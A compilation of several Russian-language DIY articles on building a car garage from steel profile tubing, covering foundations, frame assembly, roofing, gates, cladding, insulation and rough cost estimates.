Как построить гараж из профильной трубы?

Гараж из профильной трубы своими руками: как сделать, чертежи, фото, видео

Современный выбор материалов для строительства открывает широкие возможности перед теми, кто желает обеспечить свой автомобиль надежным и прочным укрытием, то есть гаражом. Они могут выполняться из кирпича и других блочных материалов, на основе деревянного или металлического каркаса и из прочих материалов, могут предназначаться для одного или нескольких автомобилей.

Иными словами, вариантов гаража множество. Одним из экономичных и практичных вариантов является гараж из профильной трубы своими руками. Профиль используется для сооружения каркаса, который затем обшивается профнастилом, сэндвич-панелями и другими материалами. Мы предлагаем вашему вниманию подробную инструкцию о строительстве гаража из профильной трубы своими руками.

Преимущества гаража из профильной трубы

Выбор профильной трубы для сооружения каркаса гаража обусловлен её определенными положительными качествами:

  • Низкая стоимость. Гараж из профильной трубы своими руками обойдется вам существенно дешевле, чем аналогичная постройка из кирпича, железобетона и т.п.;
  • Экономия на фундаменте. Вес профильных труб небольшой, поэтому для постройки их них не требуется основательный фундамент. В этом случае достаточно менее затратных оснований;
  • Простота монтажа. Практически любой человек, знакомый с технологиями выполнения строительных работ, сможет соорудить каркас гаража из профильной трубы своими руками. Профиль можно сваривать или соединять крепежом.
  • Минимум строительного мусора. Работа с профилем отличается, кроме прочих достоинств, чистотой;
  • Прочность. Гараж из профильной трубы, построенный своими руками, получится вполне прочным и надежным. В нем можно будет без опаски оставлять автомобиль, а также выполнять необходимый ремонт.

В сравнении с прочими стройматериалами, пригодными для возведения гаража, профильная труба выигрывает своей низкой ценой, возможностью выполнить практически любую отделку, разными вариантами соединения каркаса. Поэтому это хорошее решение для тех, что хочет обзавестись надежным, прочным и дешевым местом для автомобиля.

Инструменты для строительства

Для возведения гаража из профильной трубы своими руками оптимальный вариант – это квадратный профиль. С ним проще и легче работать. При использовании прямоугольного профиля сборка потребует больше усилий.

Стенка профильной трубы должна составлять 100 мм. Такой размер обеспечит нужную прочность и устойчивость. Пригодятся и более узкие трубы размером 60 мм. для элементов, которые будут придавать жёсткость конструкции.

Для реализации такого проекта понадобится следующий комплект инструментов:

  • Дрель с комплектом сверл по металлу;
  • Рулетка;
  • Болгарка с комплектом дисков по металлу;
  • Ключи;
  • Маркер.

Если вы планируете осуществлять соединение частей каркаса путем сварки, то позаботьтесь о наличии сварочного аппарата. Также необходимо обеспечить безопасность рабочего процесса. Для этого понадобятся перчатки, маска, защитные очки.

Этапы строительства

План работ при строительстве гаража из профильной трубы своими руками выглядит следующим образом:

  • Подготовка проекта;
  • Разметка участка;
  • Устройство фундамента или подготовка строительной площадки;
  • Сборка и монтаж каркаса;
  • Выполнение установки ворот;
  • Устройство кровли;
  • Утепление;
  • Обшивка постройки.

Рассмотрим подробнее каждый из шагов возведения гаража из профильной трубы своими руками.

План

План – основа успешного строительства. Хотя гараж  из профильной трубы и не кажется сложной постройкой, план требуется для правильного определения нужного количества стройматериалов, а также для точной и безошибочной реализации всех этапов.

Для начала необходимо создать предварительный план гаража, на котором, в соответствии с правилами масштабирования, нужно разместить всю постройку. Определите параметры, оптимальные именно для вашего автомобиля. Далее, опираясь на данные чертежа, рассчитайте нужное количество стройматериалов.

Обратите внимание

На этой стадии важно решить, как будет выполняться соединение частей каркаса. Если постройка планируется основательная, то имеет смысл воспользоваться сваркой. Если конструкция предполагается разборная, то можно воспользоваться крепежом.

Если самостоятельная разработка проекта гаража из профильной трубы вам неинтересна, вы всегда можете найти готовые проектные решения на специализированных сайтах в интернете.

Фундамент

Самое важное, на что стоит обратить внимание, строя гараж из профильной трубы своими руками – чертежи. Так, фундамент выполняется как раз после подготовки чертежа. Профиль сравнительно легкий, поэтому сооружать основательный фундамент необязательно. Для основания подходят:

  • Железобетонная плита. Это наиболее надежный, но и наиболее затратный вариант. Для устройства основания потребуется несколько плит, площадь которых должна превышать площадь основания постройки. Перед установкой площадка должна быть выровнена, а также должен быть подготовлен котлован и уложена песчано-гравийная подушка. На подготовленное основание кладутся плиты.
  • Монолитная армированная стяжка. Это более доступный по цене вариант, который хорошо подходит для каркасных построек.
  • Свайный фундамент. Оптимальный вариант для каркасного гаража.
  • Тротуарная плитка. Бюджетное основание. Осуществляется бетонная стяжка площадки, а на нее выкладывается тротуарная плитка.

Стены

После устройства фундамента можно переходить к сборке каркаса стен. Она осуществляется следующим образом:

  • Профиль кладется на подготовленное основание и по периметру закрепляется;
  • Устанавливаются и закрепляются вертикальные опоры. Они соединяются между собой горизонтальными элементами;
  • Выполняется верхняя обвязка. При этом важно учесть тип будущей крыши. Для односкатной крыши одну сторону каркаса нужно сделать ниже другой.
  • На горизонтальные элементы сверху крепится несущий профиль.

На этом сборка каркаса завершена.

Обшивка

Для обшивки гаража из профильной трубы своими руками выбирают профнастил. И такой выбор вполне оправдан. С профнастилом легко работать, он долговечен, доступен по цене, практичен. Для такой постройки как гараж этот вариант отлично подходит.

Кроме того, современный профнастил выполняется в разнообразных цветах, а это позволяет выбрать оптимальный вариант для вашего участка в зависимости от цветового оформления прочих построек.

При выполнении обшивки профнастилом крепеж осуществляется на саморезы с резиновыми прокладками.

Также при обшивке можно использовать сайдинг или пластик. Если вы выбрали какой-то из этих вариантов, то не забудьте выполнить предварительную обшивку каркаса OSB-плитами, которые, по сути, станут основой будущих стен.

Кроме сайдинга, пластика, профнастила можно использовать также металлочерепицу, фальшбрус, евровагонку и другие материалы. Каждый владелец может по собственному вкусу выполнить обшивку и сделать уникальный каркасный гараж из профильной трубы своими руками. Профиль предполагает широкий выбор подходящих материалов, а также использование различных декоративных приемов.

Крыша

Крыша может быть двускатной или односкатной. Односкатный вариант – более простой в исполнении. Для её выполнения одна стена каркаса делается ниже другой. Затем обе стороны соединяются поперечным профилем и покрываются выбранным материалом для кровли.

Если же планируется двускатная крыша, то отдельно необходимо выполнить фермы. На стандартный гараж потребуется около 3-4 ферм. Они монтируются к каркасу после его сборки, а затем также покрываются выбранным материалом.

Если вы планируете построить простой и дешевый гараж из профильной трубы своими руками, то лучше всего остановится на односкатной крыше, обшитой профнастилом, как и другие элементы каркаса.

Ворота

Ворота устанавливаются на готовом каркасе, но до начала обшивки. На гараж из профиля обычно устанавливают готовые секционные, роллерные ворота. Но можно своими силами сделать ворота из тех же материалов, что и вся постройку, то есть из профлиста и профильной трубы. Технология изготовления следующая:

  • Из профиля, размером 60 мм, необходимо выполнить два прямоугольника – основу будущих створок;
  • Прикрепить дополнительные ребра жесткости и укосы;
  • Установить петли на каркас. Желательно, более 2 штук с каждой стороны;
  • Повесить створки на петли;
  • Обшить вместе с другими элементами каркаса.

Также можно установить секционные ворота с автоматическим управлением. Это более дорогое, но зато более удобное решение.

Утепление

Показатели теплоизоляции у тонких стен из металла довольно низкие. Поэтому, если вы строите гараж из профильной трубы своими руками, позаботьтесь о его утеплении. Для утепления применяют минеральную вату, пенополистирол, пенопласт и другие материалы. Доступный по цене, безопасный и эффективный вариант – это утепление минеральной ватой. Оно осуществляется следующим образом:

  • Каркас обтягивается гидроизоляционным материалом. Это может быть обычный полиэтилен или специальные полимеры. Крепится гидроизоляция с помощью клея или на саморезы с пластиковыми шляпками;
  • На гидроизоляцию вертикально крепится обрешетка;
  • Между частями обрешетки укладывается минеральная вата;
  • Затем сверху конструкция укрывается еще одним слоем гидроизоляции;
  • Выполняется внутренняя обшивка гаража с помощью фанеры, пластика, гипсокартона.

Таким образом, вы получите эстетичный, практичный и очень удобный гараж без лишних затрат! Если хотите узнать больше о том, как построить гараж из профильной трубы своими руками, видео вам помогут.

Расчет стоимости материалов для строительства гаража из профильной трубы своими руками

В сравнении с капитальным строительством, возведение гаража из профильной трубы своими руками обойдется очень дешево. Конечно, точные расчеты возможно выполнить только доя конкретного проекта. Но примерная смета при самостоятельной транспортировке материалов и выполнении работ своими руками будет выглядеть так:

  • Профнастил – около 300 рублей за лист. Для стандартного гаража на одну машину потребуется примерно 12 листов, то есть 3600 рублей.
  • Профильная труба для каркаса – около 2000 рублей;
  • Утеплитель – около 2000 рублей;
  • Песок, цемент – 1000 рублей.

Итого, на гараж для одной машины нужно 8600 рублей. Это один из самых экономичных и быстрых способов построить гараж своими руками. Кроме того, такая постройка будет служить около 30 лет. Если соединения каркаса выполнялись с помощью крепежа, то её легко демонтировать и перевезти на новый участок.

Вывод

Гараж из профильной трубы своими руками – экономичное и эффективное решение вопроса обустройства места для автомобиля. Реализовать такой проект можно быстро, просто и с минимальными затратами. Мы надеемся, что наши рекомендации и советы помогут вам решить вопрос обустройства гаража наилучшим образом.

(1

Источник: https://pochtidoma.ru/stroitelstvo/garaj/garazh-iz-profilnoj-truby-svoimi-rukami/

Гараж из профильной трубы своими руками: от фундамента до крыши, этапы работы

Если вы хотите крепко спать по ночам, не боясь, что кто-то поцарапает, стукнет или угонит вашу машину, «храните» ее в гараже. Дом для авто также необходим, чтобы при необходимости ремонтировать транспортное средство, осуществлять за ним должный уход. Внутри строения можно хранить масла и детали для «железного коня».

На частной территории разместить гараж проще, чем рядом с многоэтажкой, где земля вокруг дома не принадлежит собственникам жилья. В этом случае потребуется разрешение от управляющей компании и администрации муниципалитета на установку гаражной конструкции. О том, как получить разрешение, узнавайте в органах местного самоуправления.

Но там точно не расскажут, как построить гараж из профильной трубы своими руками.

Немного теории: все о гараже из профильной трубы

Конечно, гараж можно построить практически из любого стройматериала: кирпича, газоблоков, дерева (хотя это и самый пожароопасный материал). Идеальным же вариантом в среде автовладельцев считается профильная труба. Почему?

Профильная труба является идеальным вариантом для каркасной основы будущего гаража. Материал прочный, служит долго, не теряет свойств с течением времени

Начнем с того, что профильная труба представляет собой металлическое изделие с квадратным или прямоугольным сечением. Стоимость ее довольно низкая (около 30 рублей за метр), а прочность – высокая. Профильная труба прослужит около 50 лет без потери «работоспособности».

Среди достоинств также выделяют следующие:

  • малый вес готовой конструкции позволяет отказаться от фундамента, что экономит расходы на строительство;
  • работать с профтрубами достаточно просто, для этого нужны элементарные знания в области строительства;
  • возможность сборки без сварки. Сварочный аппарат – опасный профессиональный инструмент, который имеется в распоряжении далеко не каждого хозяина. Чтобы собрать гаражное здание, профтрубы между собой можно соединять не сварочным швом, а специальными крепежными элементами или обвязкой;
  • после возведения конструкции остается мало строительного хлама, его легко собрать и вывезти самостоятельно, не пользуясь услугами уборщиков и грузчиков;
  • мобильность – одна из главнейших особенностей профильной гаражной конструкции. В случае надобности строение быстро разбирается на старом месте и легко собирается на новом. Все манипуляции можно провести за один день!

Важно: создать объект из профтруб можно за сутки, если заранее подготовить материалы, инструменты, составить план, нарисовать чертеж.

Подробнее о профтрубах расскажет видеоролик.

Для сооружения гаража из профильной трубы своими руками вам потребуются следующие инструменты и материалы:

  • квадратная профильная труба со стороной 100 миллиметров;
  • дрель по металлу;
  • саморезы;
  • сварочный аппарат (если вы решитесь соединять трубы между собой сварочным швом);
  • металлические крепления (если вы отказались от сварки в процессе строительства);
  • цементный раствор;
  • доски для опалубки;
  • профнастил;
  • утеплитель;
  • гидроизоляция.

Цементный раствор необходим только в том случае, если вы решитесь построить гаражную конструкцию на фундаменте. В нем есть необходимость, если земля довольно мягкая или местность холмистая.

Выбирайте цемент в 25-килограммовых мешках от производителей «Брозекс», «Церезит». Цена такого мешка – 200-350 рублей.

Доски тоже нужны для фундамента. В дальнейшем в процессе строительства они использоваться не будут. Необходимая толщина доски – 2-4 сантиметра.

Важно

Профнастил – это стены будущего гаража.  Им строение будет обшиваться – снаружи и изнутри. Стоимость квадратного метра панели толщиной 5-7 миллиметров  около 200 рублей. Настил не горюч, не впитывает запахи, не выделяет вредных и опасных веществ, удобен в применении.

Профнастил – крепкий и доступный материал. Его можно использовать для облицовки стен и крыши будущего гаража

Между внешним и внутренним профнастилом укладывают утеплитель. Для этой цели лучше всего подойдут пенополистирол или пенопласт.

Они стоят недорого (200-300 рублей за панель), но хорошо держат тепло, не впитывают влагу, долго сохраняют свои свойства.

Между утеплителем и внешней стенкой из профнастила помещают гидроизоляцию, чтобы наверняка обезопасить здание от повышенной влажности. Удобной в применении считается рулонная. Крепить ее можно на монтажную пену или саморезы по желанию хозяина.

Есть и самоклеящиеся варианты. За рулон такой изоляции придется выложить примерно 2500 рублей.

Тщательная подготовка: план и чертеж

До того, как подготовить инструменты и материалы для возведения каркасного гаража из профильной трубы своими руками, начертите план будущего дома для вашего авто. Каким вы видите сооружение? Если самостоятельно фантазировать сложно, обратите внимание на уже готовые планы и чертежи. Предлагаем вам примерный чертеж, куда вы сможете вставить собственные размеры.

Самый простой гараж из профнастила можно построить по этому чертежу. если нет фундамента, то объект возводится в течение суток

Гараж, построенный по такому чертежу, удобен в эксплуатации. При возведении используйте собственные размеры

Это – самый простой план гаража. Как говорится, ничего лишнего

Совет

Сложный план гаража предусматривает наличие мастерской и технических помещений для различных нужд

Важно: если гаражная конструкция будет располагаться возле многоэтажного дома, план и чертеж необходимо предоставить на рассмотрение в органы местного самоуправления. Без утверждения возводить постройку запрещено – ее обяжут снести.

Большая стройка: этапы и последовательность процесса

Возведение гаража из профтруб включает следующие этапы:

  • разметку территории под конструкцию;
  • расчистку местности под гаражное сооружение;
  • установку основания, если оно предполагается;
  • выравнивание земли, если фундамент не планируется;
  • установку каркаса из профильных труб;
  • монтаж ворот;
  • установку крыши;
  • монтаж наружных стен;
  • гидроизоляцию и утепление;
  • внутреннюю обшивку.

Под гараж укладывают ленточный или монолитный фундамент. О том, как построить их своими руками, вы узнаете из видеоинструкций, представленных ниже.

Дальнейшая инструкция по возведению гаражного сооружения выглядит так:

  1. Из профтруб выкладывают квадрат или прямоугольник, соединяют части обвязкой, сваркой или специальными креплениями. Это будущий пол гаража. По углам вертикально ставят опоры. Между ними закрепляют горизонтальные трубы. Расстояние между параллельными профтрубами – около 30-50 сантиметров. Каркас готов. Подробнее расскажет видеоролик, представленный после инструкции.

    Вот так на данном этапе должен выглядеть каркас гаража из профильной трубы. В данном случае объект стоит на монолитном фундаменте

  2. На той стене, где будут размещены ворота, горизонтальные профтрубы не кладут. На вертикальные основы монтируют петли, к ним крепят двери. Их можно купить или сделать самому из профнастила. Двери будут закрываться на амбарный замок, предусмотрите для него специальные ушки.
  3. Выполняется внешняя обшивка стен, пола и потолка. Профнастил крепят к трубкам с помощью саморезов. Получается своеобразный куб, закрытый со всех сторон.

    Гараж, покрытый профнастилом, напоминает металлический куб или прямоугольник. Авто внутри не страшны морозы и перепады температуры, осадки

  4. Внутрь укладывается гидроизоляция.
  5. На гидроизоляцию крепят пенопласт или пенополистирол. Узнать подробнее о том, каким клеем лучше для этого воспользоваться, можно здесь.
  6. Финальный штрих – внутренняя обшивка профнастилом, который тоже крепят на саморезы.

Теперь гараж из профильных труб готов. Осталось разместить приспособления для хранения нужных вещей – ящички, полочки.

Предусмотрите внутри гаража полки и ящички для хранения. В них удобно расположить разную полезную мелочь

О том, как правильно построить гаражное сооружение из профильных труб, смотрите в видеоролике.

Чтобы  было комфортно

Чтобы эксплуатация сооружения была удобной и безопасной, предусмотрите такие «мелочи», как:

  • система вентиляции. На одной из стен можно сделать небольшое окошко, которое будет легко открываться и закрываться в случае необходимости. Так в помещении не накопится угарный газ, если дверь закрыта (это особенно актуально в зимний период);
  • отопление. Устанавливать внутри газовый баллон с горелкой строго не рекомендуется. Это нарушает требования пожарной безопасности и часто приводит к трагедии (баллоны взрываются). Разумнее всего установить небольшую печку-буржуйку (предусмотрите вывод трубы на улицу) или электрический обогреватель;
  • дверь для входа в воротах. Она понадобится, если вам нужно попасть внутрь без машины. В таком случае открывать и закрывать ворота банально неудобно;
  • внутри обязательно оборудуйте уголок пожарной безопасности: расположите там огнетушитель, ведро с песком, некоторый объем простой воды. В случае возгорания все необходимое для его ликвидации будет под рукой.

В заключение

Быстровозводимый, но прочный гараж из профтрубы станет прекрасным домом для вашей «ласточки». Выбирайте только квадратный профиль со стороной в 100 миллиметров – он считается наиболее подходящим для такой работы. Соединять части постройки между собой можно не только сваркой, но и креплениями, обвязкой.

Из профильных труб можно даже двухэтажный гараж построить. По сути это два одноэтажных строения, которые расположены один на другом (на втором этаже можно хранить детали, инструменты, масла или просто отдыхать).

Профессионалы уверяют, что в целом такой гараж обойдется примерно в 10 тысяч рублей. Это намного дешевле, чем сооружение из любого другого материала.

Источник: https://stroimdom44.ru/kak-postroit-garazh-iz-profilnoj-truby/

Каркасный гараж из профильной трубы своими руками: чертеж каркаса из профтрубы

У многих автовладельцев нет постоянного места для хранения машины, поэтому приходиться тратиться на оплату услуг крытой автостоянки. Дабы этого избежать, можно возвести своими руками доступный по стоимости каркасный гараж из недорого материала за короткое время.

К примеру, из профильной трубы. Как это сделать, вы узнаете, прочитав эту статью до конца: советы опытных специалистов далее.

Почему профилированный материал выгоден для строительства гаража

Актуальность гаража не вызывает сомнений практически ни у одного автовладельца. Конечно, можно экономить, оставляя машину у дома под открытым небом, но такая практика ускорит ее износ. Реально приобрести готовый автодом в кооперативе, но, скорее всего, он не будет располагаться вблизи дома.

Выход есть! Можно возвести гараж из труб металлических диаметром 100 мм. Составлять особого труда это не будет.

Сам материал обладает рядом неоспоримых достоинств:

  • низкая стоимость по сравнению с кирпичом, железобетоном;
  • экономия на фундаменте, так как ведь конструкция из профтрубы имеет легкий вес;
  • высокая прочность каркаса позволяет выполнить обшивочные работы без риска повредить остов здания;
  • возможность быстро осуществить демонтаж строения при необходимости перенести его в иное место;
  • отсутствие мокрых операций в процессе строительных работ, за исключением возведения фундамента;
  • отсутствие усадки готового здания во время и после строительства;
  • краткие сроки возведения.

Касательно актуального для строительства вида труб, то отечественный рынок предлагает варианты с квадратным, прямоугольным срезом. Опытные мастера советуют остановить выбор на квадратных профтрубах, так как их сборка более легкая. Возводить конструкцию из прямоугольного профиля труднее.

Проектирование гаража

Работы по возведению гаража из профильной трубы нужно начинать с создания чертежей. Также потребуется составить для безошибочного выполнения работы поэтапный план. Схема должна содержать тщательную прорисовку всех деталей конструкции.

Предпочтите простой вариант, если не планируете размещать в строении большое число автомобильных принадлежностей, оборудование для ремонта авто или попросту не владеете большим опытом в подобных вопросах.

Помните! Любая дополнительная деталь повысить стоимость будущей постройки и увеличит сроки выполнения работы. При ограниченности бюджета откажитесь от лишнего декора.

Проект гаража из профильной трубы.

При строительстве автодома из металлических труб своими руками потребуется соорудить фундамент. Опытные специалисты советуют остановить выбор на комбинированном мелкозаглубленном ленточном основании с винтовыми сваями в углах фундаментной коробки.

Фундамент нужно сооружать, придерживаясь строительных норм и правил, выполняя гидроизоляцию, дренажные работы. После изготовления каркаса гаража станет ясно, какие участки основания потребуется доработать анкерными креплениями. С их помощью автодом и фундамент соединяют в единое целое.

Обязательно придерживайтесь проработанных чертежей, схемы выполнения работы, чтобы не допускать ошибок. Это также поможет правильно высчитать актуальный объем строительных материалов (с небольшим запасом).

Определитесь заранее, какой будет конструкция: сварная или разборная. В случае изготовления последнего типа каркаса потребуется приобретение дополнительных крепежных изделий, оцинкованных уголков, гаек.

Фундамент для гаража из профильной трубы

Продолжим статью рассказом о том, как построить самостоятельно гараж из профильной трубы. Для устранения риска проседания конструкции при эксплуатации важно обеспечить ее надежным фундаментом.

Основание поднимают над уровнем земли минимум на 20 см, чтобы оградить конструкцию из НКТ труб от риска затопления во время таяния снега, длительных дождей.

Рассмотрим традиционные технологии изготовления фундамента для гаражной постройки.

Технология Особенности выполнения Недостатки
Использование железобетонной плиты Железобетонная плита привозится и монтируется на выбранное заранее место Высокая стоимость, необходимость в выполнении подготовительных работ
Цельнолитая армированная стяжка Раствор бетона выливают поверх заранее подготовленной подушки из песка, щебня Практически лишен недостатков. Но организовать его можно только при условии высокой плотности грунта
Стяжка из бетона с покрытием из тротуарной плитки Поверх бетонной стяжки потребуется выполнить слой тротуарной плитки Популярный способ создания основания под автодом, но обойдется дороже бетонной стяжки
Основание со сваями Нужно выполнить бетонирование, кирпичную кладку, монтаж свай в местах с самой большой нагрузкой. Далее используется металлическая пластина, которую приваривают к верхушке созданной платформы Чрезмерная сложность, необходимость выполнения сварных работ

Каркасная конструкция

После изготовления фундамента переходим к рассказу об особенностях создания каркаса для гаража из профильной трубы. Нужно детально изучить проект выполнения работ, дабы четко придерживаться его.

Таблица металлических труб и профилей.

Приварите профильные трубы к сваям горизонтально, дабы получить цельный каркас по всему его периметру. Далее, вертикально монтируют стойки будущей конструкции, для чего применяются те же горизонтальные трубы. Металопрофиль приварите посередине высоты стоек, после чего переходят к верхней обвязке для монтажа крыши.

Каркас будущего изделия может собираться на месте, если работа выполняется своими руками, без помощников. Также можно воспользоваться более простым методом модульной сборки, которая предусматривает сборку каждой стены отдельно с последующим соединением на фундаменте.

Кровельные работы

Сделать гараж из трубы максимально теплым поможет качественно возведенная крыша. Но какой ее вид предпочесть? Специалисты утверждают, без особого опыта создать сложную по конструкции крышу, вряд ли, получиться.

Виды ферм для строительства гаража.

Остановите свой выбор на стандартном варианте односкатной крыши. Процесс ее изготовления предусматривает удлинение одной стороны каркаса за счет монтажа нескольких несущих на верхней обвязке.

Применить можно трубы квадратные, прямоугольный металлопрофиль, слово за вами. Особенной разницы нет. А за качеством сварных швов, иного рода соединений, следить нужно с особым вниманием, чтобы не возникало проблем при эксплуатации автодома.

Сама кровля изготавливается так:

  • сварите металлическую сетку из труб, как при изготовлении каркаса автодома;
  • готовую обрешетку закрепите поверх верхних зон стеновых перекрытий;
  • крышу стоит дополнительно утеплить, гидроизолировать, оснастись вентиляционными ходами;
  • на готовую обрешетку укладывается профнастил и фиксируется шурупами с пластиковыми шайбами или специальными заклепками.

Ворота для гаража из профильной трубы

Чертеж гаража из профильной трубы.

Продолжаем строительство, построенного гаража комфортабельность повысить помогут качественно обустроенные ворота. Они могут быть секционными, роллетными, навесными, распашными, подъемно-поворотными. Наиболее востребованы у отечественного потребителя распашные или навесные типы.

Изготовить изделие можно своими руками из тех же профилированных труб и листового профнастила. Для этого возьмите пару опор, зафиксируйте на них поперечную трубу. Далее обшейте конструкцию с помощью листового профнастила широкого параметра, после чего сборную конструкцию соедините со сборным механизмом.

Обратите внимание

Если конструкция будет иметь существенный вес, ее стоит оснастись подьемным механизмом. Иначе со временем она может осесть и перестать помещаться в гаражный проем. При решении изготовить подъемный механизм сборный своими силами, две трубы нужно скрепить вместе в форме колена.

На получившийся агрегат монтируют пружину, чтобы получить опору. После сборки изделие фиксируют на воротах. Крепят ворота перед монтажом внешней облицовки.

Обшивка гаража

После монтажа гаражных ворот переходят к внешним отделочным работам. Как сделать облицовку стен своими руками и что для этого применить? Специалисты с большим опытом рекомендуют обратить внимание на профлисты маркировки С21, С20.

Обшивать ими каркас для гаража очень просто. Просто приложите материал к каркасу и прикрутите его при помощи саморезов по металлу с шагом в 1 м.

Еще одним хорошим вариантом для финишной обшивки гаражного строения является сайдинговая панель. Сначала каркас гаража обшивается плитами OSB, выполняющими функцию платформы для облицовки, тепло- и звукоизоляции. Поверх OSB плит укладывают сайдинг.

Утепление и гидроизоляция

При изготовлении гаража своими руками вы отдали предпочтение металлу? Металлический каркас отличается высокими эксплуатационными параметрами и прослужит долгое время без потери первоначальных характеристик.

Но для повышения комфортабельности строения стоит позаботиться о его утеплении и гидроизоляции стен, что позволит сформировать внутри гаража здоровый микроклимат, предотвратить риск развития плесени, грибка.

Утеплительные работы выполняйте в следующем порядке:

  1. Натяните полимерную мембрану или полиэтиленовую пленку на изготовленный своими руками каркас.
  2. Выполните монтаж обрешетки, размещая между ее элементами утеплительный материал. В качестве утеплителя можно использовать пенопласт, пенополистерол, минеральную вату и другие современные материалы с высокими показателями теплосбережения.
  3. Обшейте поверхности гидроизоляционным материалом. Современный рынок предлагает широкий выбор подобных материалов. Например, разнообразные гидрофобные составы, паробарьеры, рубероид, композитные лакокрасочные составы на основе полимеров, герметики, мастики и т.д..
  4. Облицуйте стены гаража изнутри отделочный материалом. Часто стеновые поверхности внутри таких сооружений обшивают сэндвич-панелями, фанерой, керамической плиткой, чуть реже обклеивают обоями, оштукатуривают декоративными составами.

Итог

Для возведения гаража своими руками стоит воспользоваться профтрубами. Это распространенный, доступный по стоимости материал, который обладает высокими эксплуатационными параметрами.

При грамотном подходе к работе можно довольно быстро и без больших материальных затрат получить надежную, удобную в использовании конструкцию.

Источник: https://vseprogarazh.ru/strojka/material/karkasnyj-garazh-iz-profilnoj-truby/

Как построить гараж из трубы своими руками

Металлический гараж из профильной трубы своими руками

Количество современных строительных материалов позволяет построить помещение для автомобиля любой сложности и размеров. Гаражи могут быть стационарные, построенные на монолитном фундаменте из кирпича или шлакоблоков, а могут быть разборные, построенные из дерева или металла.

Одним из самых лёгких и быстро возводимых конструкций является гараж из трубы. По сути, это только каркас из металлической профильной трубы, который может быть обшит различными видами материалов, начиная от металлических листов и заканчивая сип панелями.

В этой статье мы расскажем, как построить гараж своими руками из металлической трубы, а также предоставим фото-материал для наглядности.

Создание проекта и планирование работы

Создание чертежа будущего гаража с указанием размеров

Любое строительство начинается с создания предварительного чертежа, на котором указываются все габаритные размеры конструкции (см. Стандартные размеры гаража для одного автомобиля), используемые материалы и их количество. Предварительный чертёж каркаса позволяет высчитать необходимое количество профильной трубы.

Крепёжные соединения для профильных труб

Использование сварки при сборке гаража существенно ускоряет процесс, однако в подавляющем большинстве случаев используется сборная конструкция, которая имеет ряд существенных преимуществ. Основным преимуществом является возможность демонтажа, транспортировки и повторной сборки.

Также сборный гараж позволяет в процессе эксплуатации изменить конструкцию, добавить второй этаж или расширить помещение. К тому же, далеко не каждый умеет пользоваться сварочным аппаратом.

Инструкция по созданию гаража разбивается на несколько основных этапов:

  • Разметка территории и создание фундамента, если это необходимо.
  • Создание каркаса стен и установка ворот.
  • Создание и установка крыши.
  • Обшивка каркаса гаража.

Перед тем, как построить гараж из профтрубы, нужно помнить, что такая конструкция будет лёгкой и её можно устанавливать без фундамента. Но если вы строите гараж на собственном участке, то лучше создать монолитный фундамент с армированием и делать более капитальную конструкцию с возможностью расширения при необходимости.

Инструменты и материалы

Профильная труба для каркаса гаража

Основной каркас гаража будет состоять из профильных труб, размер которых напрямую зависит от размеров самого гаража. Существуют трубы с квадратным и прямоугольным сечением, для постройки лучше выбирать квадратное сечение трубы, поскольку её легче соединять уголками.

Для основных стоек и обвязки можно использовать трубы размером 100х100 мм, которые обеспечат прочный и долговечный каркас независимо от веса отделочного материала. Для ребер жесткости и создания ферм можно использовать трубы 60х60 см.

Для работы потребуются:

  • Рулетка, желательно не меньше 10 метров.
  • Электрическая дрель и свёрла по металлу.
  • Болгарка с отрезным диском для раскроя профиля.
  • Маркер.
  • Набор ключей и головок для сборки креплений.
  • Средства индивидуальной защиты в виде очков и плотных перчаток, поскольку при резке профиля образуется металлическая стружка.

После того, как инструменты собраны и материал закуплен, можно приступать к строительству. Далее мы коротко рассмотрим процесс постройки металлического гаража из профильной трубы своими руками.

Постройка гаража из профильной трубы

Монолитный фундамент с армированием для гаража

Если постройка осуществляется на собственном участке и выбрано постоянное место для гаража, то необходимо подготовить фундамент под конструкцию, поскольку на сырой земле гараж со временем будет постепенно проседать в грунт.

В качестве фундамента можно использовать:

  • Готовые железобетонные плиты. Если позволяют финансовые возможности, то можно заказать несколько железобетонных плит, которые доставят на место грузовиком и уложат на грунт при помощи крана. Для таких плит необходимо предварительно выровнять поверхность участка, выкопать небольшой котлован и уложить слой гравийно-песчаной подушки.
  • Монолитную армированную стяжку. Самодельная стяжка с армированием будет идеальным вариантом для каркаса гаража из квадратной трубы. Получится цельная железобетонная плита, которая будет стоить значительно дешевле готовых плит, но потребует больше временных затрат на её создание. Пример такой стяжки показан на фото выше.
  • Тротуарную плитку. Использование тротуарной плитки так же является популярным вариантом для каркасного гаража. Однако этот вариант значительно дороже бетонной стяжки.

Создание каркаса из профильной трубы

Вариант соединения каркасных профилей

После установки прочного фундамента создаётся каркас гаража из квадратной трубы. Между металлическим профилем и фундаментом необходимо проложить полосу резины или рубероида, которая будет служить гидроизоляционной преградой на тот случай, если вода попадёт на фундамент.

Создание каркаса можно осуществить двумя способами:

  • Сборка на месте. Этот способ обычно используется в тех случаях, когда строительство осуществляется без помощников. Первым делом создаётся нижняя обвязка из горизонтальных профилей, которая будет основанием всей конструкции. Профили нарезают по размерам, укладывают на фундамент по периметру конструкции и соединяют между собой металлическими уголками. Между профилем и фундаментом прокладывается лента из резины или рубероида. Нижняя обвязка закрепляется на фундаменте дюбелями. Затем в углах монтируются вертикальные стойки, на которые потом устанавливается верхняя обвязка. На завершающем этапе производится установка вертикальных и горизонтальных ребер жесткости, которые предусмотрены по проекту.
  • Модульная сборка. В этом варианте каждая стена гаража собирается отдельно на ровной поверхности, со всеми предусмотренными ребрами жесткости. Затем готовые стеновые модули устанавливаются на фундамент и скрепляются между собой.

Стоит отметить, что собрать гараж из труб своими руками намного легче и быстрее при помощи второго варианта. Если в конструкции предусмотрена двухскатная крыша, то фермы также изготавливаются отдельно, обычно 3-4 штуки на стандартный размер гаража, и монтируются после сборки каркаса.

Типы ферм для гаража из профильной трубы

Если крыша гаража односкатная, то можно сделать одну из стен выше другой, после чего соединить их между собой поперечными профилями с сохранением наклона. Можно добиться уклона при помощи односкатных ферм.

Важно. При создании крыши и каркаса необходимо уже знать, какой тип материала будет использован для наружной облицовки. Например, при использовании профнастила необходимо учитывать типовые размеры листа и устанавливать ребра жесткости таким образом, чтобы стык двух листов попадал на ребро для надёжного крепления.

Обшивка каркаса и установка ворот

После завершения монтажа каркаса производится установка ворот. Лучшим вариантом для такого типа гаражей будет установка секционных или роллетных ворот механического типа, как показано на фото ниже.

Типы ворот для каркасного гаража

Установка ворот производится намного легче, пока ещё не установлена наружная обшивка. По окончанию установки ворот начинается обшивка каркаса облицовочным материалом.

